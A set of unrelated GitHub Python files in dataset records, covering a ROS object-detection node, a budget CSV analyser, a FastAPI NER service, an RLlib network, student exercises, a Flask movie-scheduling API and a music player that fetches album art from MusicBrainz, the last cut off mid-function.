np.expand_dims(image, 0)})\n\n # all outputs are float32 numpy arrays, so convert types as appropriate\n output_dict['num_detections'] = int(output_dict['num_detections'][0])\n output_dict['detection_classes'] = output_dict[\n 'detection_classes'][0].astype(np.int64)\n output_dict['detection_boxes'] = output_dict['detection_boxes'][0]\n output_dict['detection_scores'] = output_dict['detection_scores'][0]\n if 'detection_masks_reframed' in output_dict:\n output_dict['detection_masks'] = output_dict['detection_masks_reframed'][0]\n return output_dict\n\n def callback(self, data):\n if not self.ready:\n # print(\"Received image, but not yet ready, still loading...\")\n return\n if self.counter < SKIP_FRAMES:\n self.counter = self.counter + 1\n print(\"Skipping %d/%d\" % (self.counter, SKIP_FRAMES))\n return\n else:\n self.counter = 0\n try:\n image = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n\n if self.rotate:\n #Rotate90\n image = np.transpose(image, (1, 0, 2))\n image = image[::-1,:,:]\n\n\n output_dict = self.run_inference_for_single_image(image)\n\n bboxes=BBoxArray()\n bboxes.camera_topic = self.camera_topic\n bboxes.header.stamp = data.header.stamp\n bboxes.header.frame_id = data.header.frame_id\n 
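# Editor's note: detection_boxes from the TF Object Detection API are normalized to [0, 1] and ordered [ymin, xmin, ymax, xmax].\n            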
debug_list=[]\n            for box, cl, score in zip(output_dict['detection_boxes'],\n                                       output_dict['detection_classes'],\n                                       output_dict['detection_scores']):\n                if score>=self.threshold:\n                    b = BBox()\n                    b.header.seq = self.seq\n                    self.seq = self.seq+1\n                    b.header.stamp = data.header.stamp\n                    b.header.frame_id = data.header.frame_id\n                    # Boxes arrive as [ymin, xmin, ymax, xmax], so map the fields accordingly\n                    b.ymin = box[0]\n                    b.xmin = box[1]\n                    b.ymax = box[2]\n                    b.xmax = box[3]\n                    b.score = score\n                    b.name = str(self.category_index[cl]['name'])\n                    b.id = cl\n                    b.camera_topic = self.camera_topic\n                    debug_list.append(self.category_index[cl]['name']+\" (%.1f) \"%(score*100))\n                    # print(box,cl,score,self.category_index[cl]['name'])\n                    bboxes.bboxes.append(b)\n            self.bbox_pub.publish(bboxes)\n            if self.debug:\n                print(' '.join(sorted(debug_list)))\n            if self.render:\n                # Visualization of the results of a detection.\n                vis_util.visualize_boxes_and_labels_on_image_array(\n                    image,\n                    output_dict['detection_boxes'],\n                    output_dict['detection_classes'],\n                    output_dict['detection_scores'],\n                    self.category_index,\n                    instance_masks=output_dict.get('detection_masks'),\n                    min_score_thresh=self.threshold,\n                    use_normalized_coordinates=True,\n                    line_thickness=8)\n                # image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n                msg = CompressedImage()\n                msg.header.stamp = rospy.Time.now()\n                msg.format = \"jpeg\"\n                msg.data = np.array(cv2.imencode('.jpg', image)[1]).tostring()\n                self.image_pub.publish(msg)\n        except CvBridgeError as e:\n            print(e)\n\n\ndef main(args):\n    rospy.init_node('object_detection_tensorflow', anonymous=True)\n    ic = ObjectDetectionTensorflow()\n    try:\n        rospy.spin()\n    except KeyboardInterrupt:\n        print(\"Shutting down\")\n    cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n    main(sys.argv)\n","repo_name":"karolmajek/object_detection_tensorflow","sub_path":"object_detection_tensorflow/scripts/object_detection_tensorflow.py","file_name":"object_detection_tensorflow.py","file_ext":"py","file_size_in_byte":9519,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"}
{"seq_id":"71765338729","text":"# importing all dependencies\nimport os\nimport csv\n# defining path - I am using it this way because the relative path was not working for me\nPyBank=os.path.join('/Users/gabrielazamora/Python Challenge/Python_Challenge/Homework/03-Python/Instructions/PyBank/Resources/budget_data.csv')\n\n# reading the csv file\nwith open(PyBank,'r') as csv_file:\n    budget=csv.reader(csv_file)\n    header=next(budget)\n    print(header)\n# defining variables\n    total_months=0\n    net_total=0\n    profit_and_losses=[]\n    average_changes=[]\n    date=[]\n\n    for columns in budget:\n        total_months=total_months+1\n        net_total=net_total+int(columns[1])\n        profit_and_losses.append(columns[1])\n        date.append(columns[0])\n    for x in range(1,len(profit_and_losses)):\n        change=int(profit_and_losses[x])-int(profit_and_losses[x-1])\n        average_changes.append(change)\n    print(total_months,average_changes,date)\n
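    # average_changes now holds the month-over-month change in profit/loss;\n    # the summary statistics below are derived from this list.\n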
    profit_loss_change=sum(average_changes)/len(average_changes)\n    print(profit_loss_change)\n    greatest_increase=max(average_changes)\n    greatest_decrease=min(average_changes)\n    greatest_increase_date=date[average_changes.index(greatest_increase)+1]\n    greatest_decrease_date=date[average_changes.index(greatest_decrease)+1]\n    print(greatest_increase,greatest_increase_date,greatest_decrease,greatest_decrease_date)","repo_name":"ZamGabs/Python_Challenge","sub_path":"Homework/03-Python/Instructions/PyBank/PyBank.py","file_name":"PyBank.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"44426811944","text":"# Python 3.10.6\n\nfrom fastapi import FastAPI\nfrom ml import NER\nfrom pydantic import BaseModel\nfrom typing import List\n\n\napp = FastAPI()\n\n@app.get(\"/\")\nasync def hello():\n    '''\n    Simple GET API\n    '''\n    return \"Hello World!\"\n\n# Create a model for Articles\nclass Article(BaseModel):\n    content:str\n    comments: List[str] = []\n\n\n@app.post(\"/article/\")\nasync def analyze_article(articles:List[Article]):\n    '''\n    Analyze a list of articles and extract entities from them using spaCy.\n\n    Request body: [\n        {\n            \"content\": \"Apple buys U.K. startup for $1 billion dollars\",\n            \"comments\": [\"About money\",\"its good\"]\n        }]\n\n    Response body:\n    {\n        \"ents\": [\n            {\"text\": \"Apple\", \"label\": \"ORG\"},\n            {\"text\": \"U.K.\", \"label\": \"GPE\"},\n            {\"text\": \"$1 billion dollars\", \"label\": \"MONEY\"}\n        ],\n        \"comments\": [\"ABOUT MONEY\", \"ITS GOOD\"]\n    }\n    '''\n    ents = []\n    comments = []\n    for article in articles:\n        for comment in article.comments:\n            comments.append(comment.upper())\n        doc = NER(article.content)\n        for ent in doc.ents:\n            ents.append({\"text\":ent.text,\"label\":ent.label_})\n\n    return {\"ents\":ents,\"comments\":comments}\n
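\n# --- Editor's addition (hedged, not in the original file): a convenience entry\n# point so the API can be started with 'python main.py'; assumes uvicorn is\n# installed alongside FastAPI. ---\nif __name__ == \"__main__\":\n    import uvicorn\n    uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n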
","repo_name":"parth-patel97/spaCy-NER-Articles-API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"74479483369","text":"# Slightly modified version of https://github.com/ray-project/ray/blob/master/rllib/models/tf/visionnet_v2.py from the Ray RLlib project\n#\nfrom ray.rllib.models.tf.tf_modelv2 import TFModelV2\nfrom ray.rllib.models.tf.misc import normc_initializer, get_activation_fn\nfrom ray.rllib.utils import try_import_tf\n\ntf = try_import_tf()\n\n\nclass VisionNetwork(TFModelV2):\n    \"\"\"Generic vision network implemented in ModelV2 API.\"\"\"\n\n    def __init__(self, obs_space, action_space, num_outputs, model_config, name):\n        super(VisionNetwork, self).__init__(obs_space, action_space,\n                                            num_outputs, model_config, name)\n\n        map_height = model_config[\"custom_options\"][\"max_map_height\"]\n        activation = get_activation_fn(model_config.get(\"conv_activation\"))\n\n        filters = model_config.get(\"conv_filters\")\n\n        no_final_linear = model_config.get(\"no_final_linear\")\n        vf_share_layers = model_config.get(\"vf_share_layers\")\n\n        input_shape = [map_height, map_height, 6]\n        inputs = tf.keras.layers.Input(\n            shape=input_shape, name=\"observations\")\n        last_layer = inputs\n\n        # Build the action layers\n        for i, (out_size, kernel, stride) in enumerate(filters[:-1], 1):\n            last_layer = tf.keras.layers.Conv2D(\n                out_size,\n                kernel,\n                strides=(stride, stride),\n                activation=activation,\n                padding=\"valid\",\n                name=\"conv{}\".format(i))(last_layer)\n        out_size, kernel, stride = filters[-1]\n        if no_final_linear:\n            # the last layer is adjusted to be of size num_outputs\n            last_layer = tf.keras.layers.Conv2D(\n                num_outputs,\n                kernel,\n                strides=(stride, stride),\n                activation=activation,\n                padding=\"valid\",\n                name=\"conv_out\")(last_layer)\n            conv_out = last_layer\n        else:\n            last_layer = tf.keras.layers.Conv2D(\n                out_size,\n                kernel,\n                strides=(stride, stride),\n                activation=activation,\n                padding=\"valid\",\n                name=\"conv{}\".format(i + 1))(last_layer)\n            conv_out = tf.keras.layers.Conv2D(\n                num_outputs, [1, 1],\n                activation=None,\n                padding=\"same\",\n                name=\"conv_out\")(last_layer)\n\n        # Build the value layers\n        if vf_share_layers:\n            last_layer = tf.keras.layers.Lambda(\n                lambda x: tf.squeeze(x, axis=[1, 2]))(last_layer)\n            value_out = tf.keras.layers.Dense(\n                1,\n                name=\"value_out\",\n                activation=None,\n                kernel_initializer=normc_initializer(0.01))(last_layer)\n        else:\n            # build a parallel set of hidden layers for the value net\n            last_layer = inputs\n            for i, (out_size, kernel, stride) in enumerate(filters[:-1], 1):\n                last_layer = tf.keras.layers.Conv2D(\n                    out_size,\n                    kernel,\n                    strides=(stride, stride),\n                    activation=activation,\n                    padding=\"valid\",\n                    name=\"conv_value_{}\".format(i))(last_layer)\n            out_size, kernel, stride = filters[-1]\n            last_layer = tf.keras.layers.Conv2D(\n                out_size,\n                kernel,\n                strides=(stride, stride),\n                activation=activation,\n                padding=\"valid\",\n                name=\"conv_value_{}\".format(i + 1))(last_layer)\n            last_layer = tf.keras.layers.Conv2D(\n                1, [1, 1],\n                activation=None,\n                padding=\"same\",\n                name=\"conv_value_out\")(last_layer)\n            value_out = tf.keras.layers.Lambda(\n                lambda x: tf.squeeze(x, axis=[1, 2]))(last_layer)\n\n        self.base_model = tf.keras.Model(inputs, [conv_out, value_out])\n        self.register_variables(self.base_model.variables)\n\n    def forward(self, input_dict, state, seq_lens):\n        # explicit cast to float32 needed in eager\n        model_out, self._value_out = self.base_model(\n            tf.cast(input_dict[\"obs\"][\"state\"], tf.float32))\n\n        model_out = tf.squeeze(model_out, axis=[1, 2])\n        mask = input_dict[\"obs\"][\"action_mask\"]\n        inf_mask = tf.maximum(tf.log(mask), tf.float32.min)\n        masked_logits = inf_mask + model_out\n        return masked_logits, state\n\n    def value_function(self):\n        return tf.reshape(self._value_out, [-1])","repo_name":"awslabs/sagemaker-battlesnake-ai","sub_path":"source/RLlibEnv/training/training_src/cnn_tf.py","file_name":"cnn_tf.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"53"}
{"seq_id":"17917954091","text":"# Program Resistor\r\n# computes the total resistance of a circuit\r\n\r\n# DICTIONARY (variable declarations)\r\n# R1,R2,R3,RT = float\r\n# jenis = char\r\n# repeat, kondisi = bool\r\n\r\n# FUNCTIONS AND PROCEDURES\r\ndef validasi (R1,R2,R3,jenis):\r\n# a function that validates the user's input\r\n\r\n    # LOCAL DICTIONARY\r\n    # kondisi = bool\r\n    # listBenar = array of char\r\n    kondisi = True\r\n    listBenar = ['s','S','p','P']\r\n    if (R1 <= 0) or (R2 <= 0) or (R3 <= 0) :\r\n        kondisi = False\r\n    if jenis not in listBenar:\r\n        kondisi = False\r\n\r\n    if not kondisi:\r\n        print('Invalid input')\r\n        return False\r\n    else:\r\n        return True\r\n\r\ndef rtotal (R1,R2,R3,jenis):\r\n# a function that computes the total resistance, shown with only 2 decimals\r\n\r\n    # LOCAL DICTIONARY\r\n    # RT = float\r\n\r\n    if (jenis == 's') or (jenis == 'S'):\r\n        RT = R1 + R2 + R3\r\n        return (\"%.2f\" % RT)\r\n    else:\r\n        RT = 1/((1/R1) + (1/R2) + (1/R3))\r\n        return (\"%.2f\" % RT)\r\n
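\r\n# --- Editor's sketch (hedged, not part of the original program): a\r\n# generalization of rtotal to any number of resistors; 'resistors' is a list of\r\n# floats and 'jenis' uses the same 's'/'p' convention as above. ---\r\ndef rtotal_n(resistors, jenis):\r\n    if jenis in ('s', 'S'):\r\n        RT = sum(resistors)\r\n    else:\r\n        RT = 1/sum(1/R for R in resistors)\r\n    return (\"%.2f\" % RT)\r\n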
\r\n# ALGORITHM (main program)\r\nrepeat = False\r\nwhile not repeat:\r\n    R1 = float(input())\r\n    R2 = float(input())\r\n    R3 = float(input())\r\n    jenis = input()\r\n\r\n    repeat = validasi(R1,R2,R3,jenis)\r\n\r\nprint(rtotal(R1,R2,R3,jenis))\r\n","repo_name":"IvanLeovandi/Praktikum-Dasar-Pemrograman-2021-2022","sub_path":"Praktikum 4/resistor.py","file_name":"resistor.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"20756912841","text":"from main_log import logging, MainLogger, now_string\nimport numpy as np\nfrom multiprocessing import Value, Queue\nfrom curve_fit import CurveFitter\nfrom matplotlib import pyplot as plt\n\n\nMainLogger.module_set.add(__name__)\n\n\nclass ModelWorker:\n    chi_str = f'chi'\n    stderr_str = f'stderr'\n    rmse_str = f'rmse'\n    exponents_str = f'exponents'\n\n    def __init__(self,\n                 images,\n                 intensity_threshold: int,\n                 nan_replacement: dict,\n                 log_level: int,\n                 log_queue: Queue):\n        self._images = images\n        self._exponents = None\n        self._stderr = None\n        self._rmse = None\n        self._chi_squared = None\n        self._intensity_threshold = intensity_threshold\n        self._output_nan_replacement = nan_replacement\n        self._log_queue = log_queue\n        self.log_level = log_level\n        MainLogger.worker_configurer(self._log_queue)\n        self.logger = logging.getLogger(__name__)\n        self.logger.setLevel(self.log_level)\n\n    def _create_output_matrices(self, output_shape):\n        self.logger.info(f'Creating output matrices')\n        self._exponents = np.zeros(shape=output_shape)\n        self._stderr = np.zeros(shape=output_shape)\n        self._rmse = np.zeros(shape=output_shape)\n        self._chi_squared = np.zeros(shape=output_shape)\n\n    def _set_output_to_matrices(self, x, y, fit_output):\n        self._exponents[y, x] = fit_output[0]\n        self._stderr[y, x] = fit_output[1]\n        self._chi_squared[y, x] = fit_output[2]\n        self._rmse[y, x] = fit_output[3]\n\n    def _replace_nans(self):\n        self.logger.info(f'Replacing np.nan values')\n        np.nan_to_num(x=self._exponents, copy=False, nan=self._output_nan_replacement.get(ModelWorker.exponents_str, 0))\n        np.nan_to_num(x=self._stderr, copy=False, nan=self._output_nan_replacement.get(ModelWorker.stderr_str, 0))\n        np.nan_to_num(x=self._chi_squared, copy=False, nan=self._output_nan_replacement.get(ModelWorker.chi_str, 0))\n        np.nan_to_num(x=self._rmse, copy=False, nan=self._output_nan_replacement.get(ModelWorker.rmse_str, 0))\n        self.logger.info(f'Done')\n\n    def analyze_images(self, progress_value: Value, verbose_analysis: Value):\n        self.logger.info(f'Starting image analysis')\n        preprocessed_images = self._images\n        output_shape = preprocessed_images[0].shape\n        self._create_output_matrices(output_shape)\n\n        num_pixels = output_shape[0] * output_shape[1]\n        # For each pixel, analyze it and append data to the relevant output matrix,\n        # then update the progress bar\n        pixel_index = 0\n        progress = 0\n        for y in range(output_shape[1]):\n            for x in range(output_shape[0]):\n                pixel_index += 1\n                fit_output = self._analyze_pixel(x, y, verbose_analysis)\n                self._set_output_to_matrices(x, y, fit_output)\n                new_progress = (pixel_index * 100) // num_pixels\n                if new_progress > progress:\n                    progress_value.value = new_progress\n                    progress = new_progress\n                    self.logger.info(f'Analysis status: {progress}%')\n\n        # Fallback: make sure the reported progress reaches 100% even if the\n        # integer rounding above left it short\n        if progress_value.value < 100:\n            progress_value.value = 100\n            self.logger.info(f'Analysis status dirty patch promotion, progress: {progress}%')\n\n        # Replace nans in all matrices\n        self._replace_nans()\n        self.logger.info(f'Done analyzing images')\n        self._dump_output_to_csv()\n\n    def _analyze_pixel(self, x, y, verbose_analysis: Value) -> 
tuple:\n self.logger.debug(f'Start analysis for pixel: ({y}, {x})')\n # Prepare input series\n preprocessed_images = self._images\n orig_dtype = self._images.dtype\n x_data = np.array([val for val in range(len(preprocessed_images))], dtype=orig_dtype)\n y_data = np.asarray([preprocessed_images[i, y, x] for i in range(len(preprocessed_images))],\n dtype=orig_dtype)\n fitter = CurveFitter(x_data, y_data, self._log_queue, self.log_level)\n\n threshold_test = [True if pixel_intensity > self._intensity_threshold else False for pixel_intensity in y_data]\n if not any(threshold_test):\n failing_image_indices = [i for i in threshold_test if i is False]\n failing_pixel_values = [val for val in y_data if val < self._intensity_threshold]\n self.logger.debug(f'Threshold test failed, Skipping pixel analysis')\n else:\n # Optimize curve parameters to fit data\n fitter.fit(verbose_analysis, (y, x))\n\n self.logger.debug(f'Finished analyzing pixel: ({y}, {x})')\n return fitter.get_output()\n\n @staticmethod\n def _get_output_csv_name(output_name):\n return '_'.join([output_name, now_string]) + '.csv'\n\n def _dump_output_to_csv(self):\n np.savetxt(fname=self._get_output_csv_name(ModelWorker.exponents_str), X=self._exponents, delimiter=',')\n np.savetxt(fname=self._get_output_csv_name(ModelWorker.stderr_str), X=self._stderr, delimiter=',')\n np.savetxt(fname=self._get_output_csv_name(ModelWorker.rmse_str), X=self._rmse, delimiter=',')\n np.savetxt(fname=self._get_output_csv_name(ModelWorker.chi_str), X=self._chi_squared, delimiter=',')\n\n def show_pixel_histogram(self, n):\n images = self._images\n\n # Create per-image pixel histograms\n image_pixel_data = list()\n for i in range(len(images)):\n image_pixel_data.append(images[i].flatten())\n\n if n > len(images):\n self.logger.warning(f'Input num images to analyze {n} is greater than number of images {len(images)},\\n'\n f' setting n=1')\n n = 1\n\n # Create figures depicting per-image pixel histogram and finally display\n figure_data = []\n for i in range(n):\n pixel_data = np.around(image_pixel_data[i]).astype(int)\n unique_pixel_values = set(pixel_data)\n f = plt.figure(i+1)\n plt.hist(x=pixel_data, bins=len(unique_pixel_values), width=1, align='mid')\n plt.title(f'Image {i+1} pixel value histogram')\n plt.xlabel('Pixel intensity')\n plt.ylabel('Count')\n plt.grid(visible=True)\n figure_data.append(f)\n plt.show()\n\n","repo_name":"geekazaurus/fret_utility","sub_path":"model_worker.py","file_name":"model_worker.py","file_ext":"py","file_size_in_byte":6456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40249287674","text":"# ***Starting Imports, Data, and Variables*****\n\n# Import random list of numbers for assigning rooms\nimport random\n\nfrom ascii_art import hotel_front, hotel_room, room_receipt, easter_egg\n\n# This is the immutable data from the problem.\nhotel = {\n '1': {\n '101': ['George Jefferson', 'Wheezy Jefferson'],\n },\n '2': {\n '237': ['Jack Torrance', 'Wendy Torrance'],\n },\n '3': {\n '333': ['Neo', 'Trinity', 'Morpheus']\n }\n}\n\n# This list allows me to request the hotel guest in a fancier way.\nnumber_fancied_up = ['first', 'second', 'third', 'fourth',\n 'fifth', 'sixth', 'seventh', 'eighth', 'ninth', 'tenth']\n\n\ndef is_hotel_occupied(dictionary):\n is_occupied = False\n for floor in dictionary:\n is_occupied = bool(dictionary[floor])\n if is_occupied:\n return True\n print(\"\\n***We are so happy to have you checking in with us today!***\")\n return 
is_occupied\n\n\ndef menu_check_in_or_out(dictionary):\n invalid_response = is_hotel_occupied(dictionary)\n if invalid_response == False:\n status_check = \"1\"\n while invalid_response:\n status_check = input(\n \"\\n\\nHello! Will you be (choose 1 or 2): \\n1. Checking in\\n2. Check out\\n\")\n if status_check == \"1\":\n print(\"\\n***That's great! We are so happy to have you.***\")\n invalid_response = False\n elif status_check == \"2\":\n return status_check\n elif status_check == \"246\":\n print(easter_egg)\n else:\n print(\"****I have no idea what you want.****\\nPlease choose 1 or 2 only!\\n\\n\")\n return status_check\n\n\ndef get_number_occupants():\n while True:\n try:\n occupants = int(input(\n \"\\nCould you please tell me how many people are in your party?\\n\"))\n if 0 < occupants <= 6:\n print(\"***Wonderful! We can accommodate that.***\")\n return occupants\n elif occupants < 0:\n print(\"At least one person must stay in every room!\")\n else:\n print(\"Oh no, looks like your group is too big! \")\n except ValueError:\n print(\"Please enter a number.\\n\")\n\n\ndef get_floor_and_room_assignment(dictionary):\n floor_assigned = str(random.randrange(1, 10))\n room_on_floor = random.randrange(10, 50)\n room_assigned = floor_assigned + str(room_on_floor)\n restart = True\n while restart:\n restart = False\n for floor in dictionary:\n if floor_assigned == floor:\n for room in dictionary[floor]:\n if room_assigned == room:\n floor_assigned = random.randrange(1, 10)\n room_assigned = random.randrange(10, 50)\n room_assigned = str(\n floor_assigned) + str(room_assigned)\n restart = True\n break\n return floor_assigned, room_assigned\n\n\ndef get_occupant_names(total):\n occupant_names = []\n print(\n \"\\n\\n***For our records, we need to know the names of our guests.***\")\n for idx in range(total):\n occupant_names.append(input(\n f\"Please tell me the name of the {number_fancied_up[idx]} guest staying with us this trip.\\n\"))\n return occupant_names\n\n\ndef append_dictionary(key_value, names, dictionary):\n if key_value[0] in dictionary:\n dictionary[key_value[0]][key_value[1]] = names\n else:\n dictionary[key_value[0]] = {\n key_value[1]: names}\n name_of_occupants = \" & \".join(names)\n floor_index = int(key_value[0]) - 1\n print(\n f\"\\n\\n\\n\\n***Welcome, {name_of_occupants}!***\\n\\nWe have you in room {key_value[1]} on the {number_fancied_up[floor_index]} floor.\\n \")\n print(hotel_room)\n\n\ndef get_which_room():\n while True:\n try:\n room_leaving = int(\n input(\"\\n****Please tell me your room number:**** \\n\"))\n return room_leaving\n except ValueError:\n print(\"Please enter a valid room number.\")\n return room_leaving\n\n\ndef is_room_taken(dictionary, room_attempt):\n checking = True\n while checking:\n for floor in dictionary:\n for room in dictionary[floor]:\n if room_attempt == int(room):\n names = \" & \".join(\n dictionary[floor][room])\n print(\n f\"\\n\\n\\nThank you, {names}.\\nWe hope you enjoyed your stay at DC Hotel!\\n\\nHere is your receipt:\")\n check_out_receipt = room_receipt(room_attempt)\n print(check_out_receipt)\n floor_out = floor\n room_out = room\n checking = False\n del dictionary[floor_out][room_out]\n return False\n if checking:\n print(\n \"Oops, looks like this room is unoccupied. Please choose an occupied room!\")\n checking = False\n return True\n\n\ndef print_out(dictionary):\n while True:\n print_out = input(\n \"\\n\\nWould you like a print out of the current guests?\\n****Hotel Employees Only****\\n y or n? 
\\n\")\n if print_out.lower() == \"y\":\n for floor in dictionary:\n print(f\"\\n****Floor {floor}****\")\n for room in dictionary[floor]:\n guest_list = \" & \".join(dictionary[floor][room])\n print(f\"Room number: {room}\\nGuests: {guest_list}\")\n return\n elif print_out.lower() == \"n\":\n return\n else:\n print(\"****Sorry, I didn't get that.****\")\n\n\ndef is_continue_game():\n while True:\n continue_working = input(\n \"\\n\\n\\n****Would you like to continue?****\\ny or n? \\n\")\n if continue_working.lower() == \"n\":\n print(\"\\n*****Thanks for stopping by!*****\")\n return False\n elif continue_working.lower() == \"y\":\n return True\n else:\n print(\"\\n****Sorry, I didn't get that....****\")\n return True\n\n\nprint(hotel_front)\nactive_status = True\nwhile active_status:\n user_choice = menu_check_in_or_out(hotel)\n if user_choice == \"1\":\n number_of_occupants = get_number_occupants()\n floor_room = get_floor_and_room_assignment(hotel)\n occupant_names = get_occupant_names(number_of_occupants)\n append_dictionary(floor_room, occupant_names, hotel)\n elif user_choice == \"2\":\n checking_out = True\n while checking_out:\n room_leaving = get_which_room()\n checking_out = is_room_taken(hotel, room_leaving)\n print_out(hotel)\n active_status = is_continue_game()\n","repo_name":"crystalatk/Day5","sub_path":"large_2.py","file_name":"large_2.py","file_ext":"py","file_size_in_byte":6794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15980344441","text":"from flask import Flask, request, jsonify\r\n\r\napp = Flask(__name__)\r\napp.config[\"DEBUG\"] = True\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef home():\r\n\r\n req = request.get_json()\r\n movie_data=req[\"Movie data\"]\r\n\r\n result = manage_movies(movie_data)\r\n \r\n\r\n return jsonify(result), 200\r\n\r\n\r\n# Function which find the maxprofit and the selcted movies list\r\n\r\ndef manage_movies(movies_data):\r\n \r\n month = {'jan':1, 'feb':2, 'mar':3, 'apr':4, 'may':5, 'jun':6, 'jul':7, 'aug':8, 'sep':9, 'oct':10, 'nov':11, 'dec':12}\r\n \r\n # Converting string date to list of int for better comparison\r\n # date[0] : day\r\n # date[1] : month\r\n for movie in movies_data:\r\n start = movie['Start']\r\n start = start.split()\r\n movie['Start'] = [int(start[0]), month[start[1].lower()]]\r\n\r\n end = movie['End']\r\n end = end.split()\r\n movie['End'] = [int(end[0]), month[end[1].lower()]]\r\n\r\n movies_data = sort_movie(movies_data)\r\n\r\n movies_lists = [[movie['movie']] for movie in movies_data]\r\n profit_list = [1 for movie in movies_data]\r\n \r\n # Dp for finding max profit\r\n for i in range(1,len(movies_data)):\r\n for j in range(i):\r\n if ( movies_data[j]['End'][1]<movies_data[i]['Start'][1] or # If end month is before start month\r\n \r\n ( movies_data[j]['End'][1]==movies_data[i]['Start'][1] and # or end month is same to start month and day is before\r\n movies_data[j]['End'][0]<movies_data[i]['Start'][0] )\r\n \r\n ) and ((profit_list[j] + 1) > profit_list[i]):\r\n \r\n profit_list[i] = profit_list[j] + 1\r\n \r\n movies_lists[i] = [movies_lists[i][0]] + movies_lists[j]\r\n \r\n \r\n max_profit = max(profit_list)\r\n index = profit_list.index(max_profit)\r\n \r\n selected_movies = movies_lists[index]\r\n \r\n result_list = []\r\n \r\n for movie in movies_data:\r\n if movie['movie'] in selected_movies:\r\n result_list.append(movie)\r\n \r\n month = {1:'jan', 2:'fab', 3:'mar', 4:'apr', 5:'may', 6:'jun', 7:'jul', 8:'aug', 9:'sep', 
10:'oct', 11:'nov', 12:'dec'}\r\n\r\n #Converting back, date to string data\r\n for movie in result_list:\r\n\r\n start = movie['Start']\r\n start[0] = str(start[0])\r\n start[1] = month[start[1]]\r\n movie['Start'] = \" \".join(start)\r\n \r\n end = movie['End']\r\n end[0]=str(end[0])\r\n end[1] = month[end[1]]\r\n movie['End'] = \" \".join(end)\r\n\r\n return {'Max Profit':max_profit, 'Movies list':result_list}\r\n \r\n\r\n# A function which sort the movies in acsending order of there end date\r\ndef sort_movie(movies_data):\r\n for i in range(len(movies_data)-1):\r\n for j in range(i+1,len(movies_data)):\r\n if movies_data[j]['End'][0]<movies_data[i]['End'][0] and movies_data[j]['End'][1]<=movies_data[i]['End'][1]:\r\n temp = movies_data[i]\r\n movies_data[i] = movies_data[j]\r\n movies_data[j] = temp\r\n \r\n return movies_data\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","repo_name":"Ashutosh24197/Movie-api","sub_path":"manage_movies_dp.py","file_name":"manage_movies_dp.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8573230383","text":"import tkinter as tk\nfrom tkinter import PhotoImage\nfrom PIL import Image, ImageTk\nimport os\nimport pygame\nimport musicbrainzngs as mb\nfrom mutagen.easyid3 import EasyID3 # Import EasyID3 for mp3 files\nimport requests \n\n# Initialize pygame for audio\npygame.mixer.init()\n\n# Set the MusicBrainz API base URL\nmb.set_useragent(\"AlbumArtDownloader\", \"1.0\")\n\n# Initialize music_directory and audio_files as global variables\nmusic_directory = \"/home/dino/Music\"\naudio_files = []\n\n\n# Function to fetch album art using MusicBrainz API\ndef fetch_album_art(artist_name, album_name, output_directory):\n # Construct the query for fetching album art from Cover Art Archive\n query = f\"{artist_name} {album_name}\"\n url = f\"https://musicbrainz.org/ws/2/release/?query={query}&fmt=json\"\n\n try:\n # Send a GET request to the MusicBrainz API\n response = requests.get(url)\n\n # Check if the response was successful\n if response.status_code == 200:\n data = response.json()\n\n # Check if any releases were found\n if \"releases\" in data and len(data[\"releases\"]) > 0:\n release_id = data[\"releases\"][0][\"id\"]\n\n # Construct the URL for fetching album art from Cover Art Archive\n album_art_url = (\n f\"https://coverartarchive.org/release/{release_id}/front\"\n )\n\n # Send a GET request to fetch the album art\n response = requests.get(album_art_url)\n\n # Check if the response was successful\n if response.status_code == 200:\n # Save the album art image\n with open(\n os.path.join(output_directory, f\"{album_name}.jpg\"), \"wb\"\n ) as f:\n f.write(response.content)\n else:\n print(\"Cover art not found.\")\n else:\n print(\"No releases found.\")\n else:\n print(\"Error fetching data from MusicBrainz.\")\n except Exception as e:\n print(f\"Error: {e}\")\n\n\n# Function to get metadata from audio file\ndef get_metadata(file_path):\n try:\n audio = EasyID3(file_path)\n metadata = {\n \"artist\": audio.get(\"artist\", [\"Unknown Artist\"])[0],\n \"album\": audio.get(\"album\", [\"Unknown Album\"])[0],\n \"title\": audio.get(\"title\", [\"Unknown Title\"])[0],\n # Add more metadata fields as needed\n }\n return metadata\n except Exception as e:\n print(f\"Error extracting metadata: {e}\")\n return {}\n\n\n# Function to play the audio\ndef play_audio(audio_file):\n pygame.mixer.music.load(audio_file)\n pygame.mixer.music.play()\n metadata 
= get_metadata(audio_file)\n artist_name = metadata[\"artist\"]\n album_name = metadata[\"album\"]\n title = metadata[\"title\"]\n # Fetch and display album art\n fetch_album_art(artist_name, album_name, album_art_output_directory)\n update_song_info(title, artist_name, album_name)\n\n\n# Function to pause the audio\ndef pause_audio():\n pygame.mixer.music.pause()\n\n\n# Function to stop the audio\ndef stop_audio():\n pygame.mixer.music.stop()\n\n\n# Function to play the next audio file\ndef play_next_audio():\n global current_audio_index\n current_audio_index = (current_audio_index + 1) % len(audio_files)\n play_audio(os.path.join(music_directory, audio_files[current_audio_index]))\n\n\n# Function to update song information (name, artist, album, and album art)\ndef update_song_info(title, artist_name, album_name):\n song_name_label.config(text=title) # Update song name label\n artist_label.config(text=f\"Artist: {artist_name}\") # Update artist label\n album_label.config(text=f\"Album: {album_name}\") # Update album label\n # Load and display album art image\n album_art_path = os.path.join(album_art_output_directory, f\"{album_name}.jpg\")\n 